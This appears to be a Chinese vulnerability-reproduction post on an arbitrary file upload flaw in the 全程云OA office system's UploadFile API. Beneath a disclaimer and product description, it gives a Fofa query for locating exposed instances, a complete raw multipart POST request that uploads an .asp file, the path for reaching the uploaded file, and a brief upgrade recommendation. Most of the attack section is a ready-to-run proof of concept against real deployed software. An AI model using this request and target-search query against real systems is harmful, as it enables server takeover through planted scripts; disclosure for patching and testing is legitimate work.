【漏洞复现】全程云OA UploadFile 任意文件上传漏洞

免责声明：

        本文内容旨在提供有关特定漏洞或安全漏洞的信息，以帮助用户更好地了解可能存在的风险。公布此类信息的目的在于促进网络安全意识和技术进步，并非出于任何恶意目的。阅读者应该明白，在利用本文提到的漏洞信息或进行相关测试时，可能会违反某些法律法规或服务协议。同时，未经授权地访问系统、网络或应用程序可能导致法律责任或其他严重后果。作者不对读者基于本文内容而产生的任何行为或后果承担责任。读者在使用本文所提供的信息时，必须遵守适用法律法规和相关服务协议，并独自承担所有风险和责任。如有侵权，请联系删除。

产品简介

全程云OA为企业提供日常办公管理、公文管理、工作请示、汇报、档案、知识体系、预算控制等26个功能，超过100多个子模块。为企业内部提供高效、畅通的信息渠道，同时也能大力推动公司信息系统发展，提高企业的办公自动化程度和综合管理水平，加快企业信息的流通，提高企业市场竞争能力。

漏洞描述

全程云OA UploadFile 文件存在一个任意文件上传漏洞。攻击者可以通过这个漏洞上传恶意文件到服务器，从而获取服务器的控制权，以及在服务器上执行任意命令，访问敏感数据，甚至完全接管服务器，对系统的安全性构成严重威胁。

网络空间会测

Fofa

"全程云OA" || "images/yipeoplehover.png"

漏洞复现

POST /OA/api/2.0/Common/AttachFile/UploadFile HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 UBrowser/4.0.3214.0 Safari/537.36
Content-Type: multipart/form-data; boundary=4fe2d3a7d409edcc9016473651a05c1ea4cef22837fefafd2af655b42288
Content-Length: 279
Accept-Encoding: gzip, deflate, br
Connection: keep-alive--4fe2d3a7d409edcc9016473651a05c1ea4cef22837fefafd2af655b42288
Content-Disposition: form-data; name="upload"; filename="j4hm38.asp"
Content-Type: application/octet-stream<% response.write("hello,world") %>
--4fe2d3a7d409edcc9016473651a05c1ea4cef22837fefafd2af655b42288--

上传后的文件名为 fileTargetName

/OA/upfiles/temp/{{fileTargetName}}

修复建议

升级到产品到最新版本